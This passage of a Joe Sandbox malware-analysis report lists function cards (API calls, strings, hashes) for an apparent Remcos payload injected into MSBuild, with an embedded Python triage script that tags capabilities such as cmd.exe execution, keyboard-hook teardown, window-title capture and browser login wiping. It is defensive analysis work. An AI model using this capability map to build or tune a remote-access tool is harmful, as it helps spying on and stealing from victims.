  • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 00434800
• __CxxThrowException@8.LIBVCRUNTIME ref: 0040CE2C
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
• String ID: bad locale name
• API String ID: 3628047217-1405518554
• Opcode ID: 2c952230bb5508a40ba9b400b3509c8dd800ec2376424fb743b9d3d13ecaa97f
• Instruction ID: 69d9b4558c1556c2c918d31b5ea24064f6fee533cc814fb99c42b36f0b05f267
• Opcode Fuzzy Hash: 2c952230bb5508a40ba9b400b3509c8dd800ec2376424fb743b9d3d13ecaa97f
• Instruction Fuzzy Hash: 1AF08171400204EAC724FB23D853ACA73A49F54748F90497FB506214D2EF38A618CA8C
APIs
• IsValidLocale.KERNEL32(00000000,j=D,00000000,00000001,?,?,00443D6A,?,?,?,?,00000004), ref: 004477DC
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: LocaleValid
• String ID: IsValidLocaleName$j=D$u;~/
• API String ID: 1901932003-4051686270
• Opcode ID: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
• Instruction ID: d075984350fdfa8650c9f53b231b8a0b142c4dacf6ed37e79753978632a381d4
• Opcode Fuzzy Hash: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
• Instruction Fuzzy Hash: B7F0E930A45218F7EA116B61DC06F5EBB54CF49B11F50407AFD056A293CB796D0195DC
                                                                                                                                            APIs
                                                                                                                                            • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004151F4
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                             • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ExecuteShell
                                                                                                                                            • String ID: /C $cmd.exe$open
                                                                                                                                            • API String ID: 587946157-3896048727
                                                                                                                                            • Opcode ID: 6699625853e23096ac9cad3f7578a7bff2c993ae7ed2a6c2b658dd2f5a42760b
                                                                                                                                            • Instruction ID: 3ae8c2b06d9b1922b9065f49b1512f2a4b1b87a12dccb2265ed1bd098505db2c
                                                                                                                                            • Opcode Fuzzy Hash: 6699625853e23096ac9cad3f7578a7bff2c993ae7ed2a6c2b658dd2f5a42760b
                                                                                                                                            • Instruction Fuzzy Hash: D8E030701043006AC708FB61DC95C7F77AC9A80708F10083EB542A21E2EF3CA949C65E
                                                                                                                                            APIs
                                                                                                                                            • TerminateThread.KERNEL32(Function_000099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                                                                            • UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                                                                            • TerminateThread.KERNEL32(Function_00009993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                             • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: TerminateThread$HookUnhookWindows
                                                                                                                                            • String ID: pth_unenc
                                                                                                                                            • API String ID: 3123878439-4028850238
                                                                                                                                            • Opcode ID: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                                                                                                                                            • Instruction ID: c35477c7b81069fed5c639b3d306817a7c517f63bcb5e1090982200d4e51bed9
                                                                                                                                            • Opcode Fuzzy Hash: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                                                                                                                                            • Instruction Fuzzy Hash: 32E01DB1209317DFD3101F546C84825B799EB44356324047FF6C155252C5798C54C759
                                                                                                                                            APIs
                                                                                                                                            • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014DF
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004014E6
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                             • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                                            • String ID: GetLastInputInfo$User32.dll
                                                                                                                                            • API String ID: 2574300362-1519888992
                                                                                                                                            • Opcode ID: 3fc7b1db73b7af1b2a271cc819159fe1e403f0356e3f7920f37c5b1d7d3a7c56
                                                                                                                                            • Instruction ID: 425bdc246283df71b7ad83aa0519e38d385401eab2b134f4ae8d574857069069
                                                                                                                                            • Opcode Fuzzy Hash: 3fc7b1db73b7af1b2a271cc819159fe1e403f0356e3f7920f37c5b1d7d3a7c56
                                                                                                                                            • Instruction Fuzzy Hash: D7B092B85843849BC7202BE0BC0DA297BA4FA48B43720447AF406D11A1EB7881809F6F
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                             • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __alldvrm$_strrchr
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1036877536-0
                                                                                                                                            • Opcode ID: 63f75d4c6ddf9dfadee5a9a28b1451e266bcc439c32975fae3941ae33d1a5297
                                                                                                                                            • Instruction ID: 63a095292c52d92af2bf19a392fdfa9b0d117a80b68c781492b1ecdde0b53e6f
                                                                                                                                            • Opcode Fuzzy Hash: 63f75d4c6ddf9dfadee5a9a28b1451e266bcc439c32975fae3941ae33d1a5297
                                                                                                                                            • Instruction Fuzzy Hash: 60A168729042469FFB21CF58C8817AEBBE2EF55314F24416FE5849B382DA3C8D45C759
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                             • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: d2c3ac181d975cfacaee5c3ec40136b8bdf5b2422b9dd14ab5655829a2308330
                                                                                                                                            • Instruction ID: 90b3d0a8f148eb65ba096d855dd205fb67a40d318d5acb0a54968c3478788488
                                                                                                                                            • Opcode Fuzzy Hash: d2c3ac181d975cfacaee5c3ec40136b8bdf5b2422b9dd14ab5655829a2308330
                                                                                                                                            • Instruction Fuzzy Hash: 10412B71A00744AFF724AF78CC41B6ABBE8EF88714F10452FF511DB291E679A9458788
                                                                                                                                            APIs
                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
                                                                                                                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
                                                                                                                                            • __freea.LIBCMT ref: 100087D5
                                                                                                                                              • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                             • Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2652629310-0
                                                                                                                                            • Opcode ID: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                                                                                            • Instruction ID: 5b9b35b0a4db414dac5c81271493033b4f2f0f3dd9b893eeefd60fa04c8ec889
                                                                                                                                            • Opcode Fuzzy Hash: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                                                                                            • Instruction Fuzzy Hash: 2731AE32A0021AABEF15CF64CC85EAF7BA5EF44290F214129FC48D7158EB35DE50CBA0
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            • [Cleared browsers logins and cookies.], xrefs: 0040B8DE
                                                                                                                                            • Cleared browsers logins and cookies., xrefs: 0040B8EF
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                             • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Sleep
                                                                                                                                            • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                                                                                            • API String ID: 3472027048-1236744412
                                                                                                                                            • Opcode ID: fb9c94c919f491c47112702eb50a98d9c9131fc5c480903e1a404da5156a74b6
                                                                                                                                            • Instruction ID: 8ec9c8031b8ac0664cfb8a22ca307bf710261ddd843e88104a77dac6ce00e7b7
                                                                                                                                            • Opcode Fuzzy Hash: fb9c94c919f491c47112702eb50a98d9c9131fc5c480903e1a404da5156a74b6
                                                                                                                                            • Instruction Fuzzy Hash: FA31891564C3816ACA11777514167EB6F958A93754F0884BFF8C4273E3DB7A480893EF
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                                                              • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                                                              • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                                                                            • Sleep.KERNEL32(00000BB8), ref: 004115C3
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                             • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseOpenQuerySleepValue
                                                                                                                                            • String ID: @CG$exepath$BG
                                                                                                                                            • API String ID: 4119054056-3221201242
                                                                                                                                            • Opcode ID: 210cb540f6a83319de20fac2fd682447bc31916e54f5a605e097a05a178efdaa
                                                                                                                                            • Instruction ID: 48aadeccb903c06d46a934e3c92f1fe58b0119fffb77d403c20537554d94cb98
                                                                                                                                            • Opcode Fuzzy Hash: 210cb540f6a83319de20fac2fd682447bc31916e54f5a605e097a05a178efdaa
                                                                                                                                            • Instruction Fuzzy Hash: C721F4A0B002042BD614B77A6C06ABF724E8BD1308F00457FBD4AA72D3DE7D9D4581AD
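The function cards above (the 0x400000 image inside the MSBuild snapshot, which the report attributes to the injected Remcos payload) each list the Win32 APIs a function calls, the string references it resolves, and a fuzzy hash. Reading hundreds of these by hand is slow, so the usual triage step is to parse the cards and tag each function with the capability its API and string combination implies: ShellExecuteW with "open" and "cmd.exe" is command execution through a shell, TerminateThread next to UnhookWindowsHookEx is teardown of the keyboard hook, LoadLibraryA("User32.dll") followed by GetProcAddress with the string "GetLastInputInfo" is a dynamically resolved idle-time check, and RegOpenKeyExA on root key 80000001 (HKEY_CURRENT_USER) plus RegQueryValueExA with the string "exepath" and Sleep(00000BB8), that is 3000 ms, is a configuration read from the registry followed by a delay. The script below is an added example, not Joe Sandbox code and not part of the report: it parses the card format as printed here into API tuples and string lists and applies a small rule table. The sample text is copied from four cards in this section; the rule table, the tag names and the 1000 ms delay threshold are this example's own choices and can be extended by the analyst.

```python
"""Parse Joe Sandbox function cards and tag each one with the capability
its API/string combination implies.

Added example, not Joe Sandbox code. SAMPLE is copied from four cards in
this section of the report; RULES and the tag names are assumptions made
here for illustration, not Joe Sandbox identifiers.
"""
import re
from dataclasses import dataclass, field

# "• Name.MODULE(arg,arg,...), ref: ADDR", optionally prefixed by
# "Part of subcall function ADDR:"; parentheses are absent for CRT calls
# such as "__freea.LIBCMT ref: 100087D5".
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
STRING_ID_LINE = re.compile(r"^\s*•\s*String ID:\s*(?P<strings>.*)$")
SNAPSHOT_LINE = re.compile(r"^\s*•\s*Snapshot File:\s*(?P<file>\S+)")
CARD_END = re.compile(r"^\s*•\s*Instruction Fuzzy Hash:")

HKEY_CURRENT_USER = "80000001"  # root-key handle value as the report prints it


@dataclass
class Card:
    snapshot: str = ""
    apis: list = field(default_factory=list)     # (name, module, args, ref, parent)
    strings: list = field(default_factory=list)  # String ID field split on '$'

    def api_names(self):
        return {a[0] for a in self.apis}

    def refs(self):
        return [a[3] for a in self.apis]


def parse_cards(text):
    """Split report text into Cards; a card ends at its Instruction Fuzzy Hash."""
    cards, cur = [], Card()
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            args = [a.strip() for a in (m["args"] or "").split(",") if a.strip()]
            cur.apis.append((m["name"], m["module"], args, m["ref"], m["parent"]))
            continue
        m = STRING_ID_LINE.match(line)
        if m:
            cur.strings = [s.strip() for s in m["strings"].split("$") if s.strip()]
            continue
        m = SNAPSHOT_LINE.match(line)
        if m:
            cur.snapshot = m["file"]
            continue
        if CARD_END.match(line):
            cards.append(cur)
            cur = Card()
    return cards


# (tag, APIs that must all be present, string fragments that must all appear)
RULES = [
    ("shell-command-execution", {"ShellExecuteW"}, {"cmd.exe"}),
    ("keyboard-hook-teardown", {"UnhookWindowsHookEx", "TerminateThread"}, set()),
    ("idle-time-check-via-dynamic-import", {"LoadLibraryA", "GetProcAddress"}, {"GetLastInputInfo"}),
    ("config-read-from-registry", {"RegOpenKeyExA", "RegQueryValueExA"}, {"exepath"}),
    ("display-enumeration", {"EnumDisplayMonitors", "EnumDisplayDevicesW"}, set()),
    ("browser-credential-wipe-log", set(), {"Cleared browsers logins and cookies."}),
]


def tag_card(card):
    names = card.api_names()
    tags = [tag for tag, apis, strs in RULES
            if apis <= names
            and all(any(s in cs for cs in card.strings) for s in strs)]
    for name, _, args, _, _ in card.apis:
        # Sleep's argument is a hex DWORD of milliseconds; flag long delays.
        if name == "Sleep" and args:
            try:
                ms = int(args[0], 16)
            except ValueError:
                continue  # the report prints '?' for values it could not resolve
            if ms >= 1000:
                tags.append(f"sleep-{ms}ms")
        # First RegOpenKeyEx argument is the root key; 0x80000001 is HKCU.
        if name.startswith("RegOpenKeyEx") and args and args[0].upper() == HKEY_CURRENT_USER:
            tags.append("hkcu-access")
    return tags


def triage(text):
    """Return {first API ref: sorted tags} for every card that matched a rule."""
    out = {}
    for card in parse_cards(text):
        tags = tag_card(card)
        if tags:
            out[card.refs()[0] if card.refs() else card.snapshot] = sorted(tags)
    return out


# Copied from the cards in this section (trimmed to the lines the parser uses).
SAMPLE = """\
APIs
• ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004151F4
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
• String ID: /C $cmd.exe$open
• Instruction Fuzzy Hash: D8E030701043006AC708FB61DC95C7F77AC9A80708F10083EB542A21E2EF3CA949C65E
APIs
• TerminateThread.KERNEL32(Function_000099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
• UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
• TerminateThread.KERNEL32(Function_00009993,00000000,?,pth_unenc), ref: 0040AFE3
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
• String ID: pth_unenc
• Instruction Fuzzy Hash: 32E01DB1209317DFD3101F546C84825B799EB44356324047FF6C155252C5798C54C759
APIs
• LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014DF
• GetProcAddress.KERNEL32(00000000), ref: 004014E6
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
• String ID: GetLastInputInfo$User32.dll
• Instruction Fuzzy Hash: D7B092B85843849BC7202BE0BC0DA297BA4FA48B43720447AF406D11A1EB7881809F6F
APIs
  • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
  • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
  • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
• Sleep.KERNEL32(00000BB8), ref: 004115C3
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
• String ID: @CG$exepath$BG
• Instruction Fuzzy Hash: C721F4A0B002042BD614B77A6C06ABF724E8BD1308F00457FBD4AA72D3DE7D9D4581AD
"""

if __name__ == "__main__":
    for ref, tags in triage(SAMPLE).items():
        print(ref, ", ".join(tags))
```

Rules are deliberately conjunctive: an API name alone (TerminateThread, Sleep, RegOpenKeyExA) appears in benign code, so a tag fires only when the API set and the string references of the same function line up. Arguments the sandbox could not resolve are printed as `?` and must be tolerated rather than parsed, and the "Part of subcall function" lines are folded into the card that calls them, which is why the registry card above is tagged through its subcall.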
APIs
• EnumDisplayMonitors.USER32(00000000,00000000,004186FC,00000000), ref: 00418622
• EnumDisplayDevicesW.USER32(?), ref: 00418652
• EnumDisplayDevicesW.USER32(?,?,?,00000000), ref: 004186C7
• EnumDisplayDevicesW.USER32(00000000,00000000,?,00000000), ref: 004186E4
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: DisplayEnum$Devices$Monitors
• String ID:
• API String ID: 1432082543-0
APIs
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: SystemTimes$Sleep__aulldiv
• String ID:
• API String ID: 188215759-0
APIs
  • Part of subcall function 0041B6E6: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B6F6
  • Part of subcall function 0041B6E6: GetWindowTextLengthW.USER32(00000000), ref: 0041B6FF
  • Part of subcall function 0041B6E6: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041B729
• Sleep.KERNEL32(000001F4), ref: 00409C95
• Sleep.KERNEL32(00000064), ref: 00409D1F
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: Window$SleepText$ForegroundLength
• String ID: [ $ ]
• API String ID: 3309952895-93608704
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• ___BuildCatchObject.LIBVCRUNTIME ref: 0043810F
  • Part of subcall function 0043805C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0043808B
  • Part of subcall function 0043805C: ___AdjustPointer.LIBCMT ref: 004380A6
• _UnwindNestedFrames.LIBCMT ref: 00438124
• __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00438135
• CallCatchBlock.LIBVCRUNTIME ref: 0043815D
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
• String ID:
• API String ID: 737400349-0
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
• GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D
Memory Dump Source
• Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID:
• API String ID: 3177248105-0
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004471B7,00000000,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue), ref: 00447242
• GetLastError.KERNEL32(?,004471B7,00000000,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000,00000364,?,00446F91), ref: 0044724E
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004471B7,00000000,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000), ref: 0044725C
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID:
• API String ID: 3177248105-0
APIs
• GetSystemMetrics.USER32(0000004C), ref: 00418519
• GetSystemMetrics.USER32(0000004D), ref: 0041851F
• GetSystemMetrics.USER32(0000004E), ref: 00418525
• GetSystemMetrics.USER32(0000004F), ref: 0041852B
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: MetricsSystem
• String ID:
• API String ID: 4116985748-0
APIs
• __startOneArgErrorHandling.LIBCMT ref: 00441F6D
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: ErrorHandling__start
• String ID: pow
• API String ID: 3213639722-2276729525
• Opcode ID: c11d7b0c0eb8e10153fe90c38a808d625a788e1790705f3c08302100bb714254
• Instruction ID: c296867054112a427edbdd16b3baf579c6faf9d8481746a729c2ad46b2c40409
• Opcode Fuzzy Hash: c11d7b0c0eb8e10153fe90c38a808d625a788e1790705f3c08302100bb714254
• Instruction Fuzzy Hash: 2A517B61A1620196F7117714C98137F2BD0DB50741F688D6BF085423F9DF3D8CDA9A4E
APIs
• _free.LIBCMT ref: 1000655C
  • Part of subcall function 100062BC: IsProcessorFeaturePresent.KERNEL32(00000017,100062AB,00000000,?,?,?,?,00000016,?,?,100062B8,00000000,00000000,00000000,00000000,00000000), ref: 100062BE
